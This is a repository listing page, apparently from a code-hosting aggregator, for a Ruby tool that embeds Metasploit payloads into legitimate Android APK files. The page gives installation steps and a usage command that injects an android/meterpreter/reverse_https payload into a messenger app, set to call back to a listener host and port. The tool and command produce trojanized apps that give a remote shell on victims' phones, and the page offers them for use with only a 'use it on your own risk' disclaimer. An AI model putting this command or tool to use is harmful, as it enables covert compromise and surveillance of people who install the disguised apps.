• Stars
    star
    115
  • Rank 305,916 (Top 7 %)
  • Language
    Ruby
  • Created over 8 years ago
  • Updated over 3 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Embed a Metasploit Payload in an Original .Apk File

Use it on your own risk Donate

Embed a Metasploit Payload in an Original .Apk File

I choose a lazy person to do a hard job. Because a lazy person will find an easy way to do it.

— Bill Gates

This script is a POC for injecting metasploit payloads on arbitrary APKs

Authored by timwr, Jack64 , developed by xC0d3rZ

Installation

 gem install bundler
 bundler install

Requirements

  1. Ruby (>= 1.8.7).
  2. apktool.jar (>= 2.x).

Usage

./run [target.apk] [msfvenom options]

e.g
./run messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443

Download